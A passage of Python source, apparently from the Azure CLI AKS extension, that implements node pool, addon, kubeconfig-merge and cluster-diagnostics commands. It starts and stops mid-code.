"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData,
host_group_id=host_group_id,
capacity_reservation_group_id=crg_id
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
if message_of_the_day:
agent_pool.message_of_the_day = _get_message_of_the_day(
message_of_the_day)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
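# Upgrade a single node pool: either bump only the node image (--node-image-only) or set a new
# orchestrator version, optionally sourcing the version from a snapshot and honoring --max-surge
# in the upgrade settings.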
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. '
'If you only want to upgrade the node image version, please use the "--node-image-only" option.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
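# Update mutable node pool settings (autoscaler state and bounds, tags, labels, taints, mode,
# scale-down mode, max surge). If no update argument is given, the user is prompted to reconcile
# the pool to its current settings.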
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
reconcilePrompt = 'No arguments were specified to update; would you like to reconcile the node pool to its current settings?'
if not prompt_y_n(reconcilePrompt, default="n"):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'The value of min-count must be less than or equal to the value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
ignore_pod_disruption_budget=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name, ignore_pod_disruption_budget=ignore_pod_disruption_budget)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
# this is overwritten by _update_addons(), so the value needs to be recorded here
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# MDM metrics are supported only in the Azure public cloud, so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pools will reside in the same vnet; we will grant a vnet-level Contributor role
# in a later function, so using an arbitrary agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Otherwise the cluster is not using a custom VNet; the permission is already granted in the AKS RP,
# so we don't need to handle it on the client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
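# Toggle addon profiles on the managed cluster model for aks enable-addons/disable-addons.
# Each addon gets its own config handling; addons that are already enabled raise a CLIError
# telling the user to disable them first. The modified ManagedCluster instance is returned for
# the caller to send back to the service.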
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
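# Merge one kubeconfig section (clusters/users/contexts) from 'addition' into 'existing',
# prompting before overwriting an entry with the same name unless 'replace' is set.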
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
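# Merge the downloaded kubeconfig into the user's existing config file, optionally renaming the
# context, and warn if the resulting file is not restricted to owner read/write (0600) on
# non-Windows platforms.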
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
for _, diag_setting in enumerate(diag_settings):
if diag_setting:
return diag_setting.storage_account_id
print("No diag settings specified")
return None
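# Poll the aks-periscope custom resources ('apd') with kubectl and print per-node network
# configuration and outbound connectivity tables once results are available for all ready nodes.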
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Cannot find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
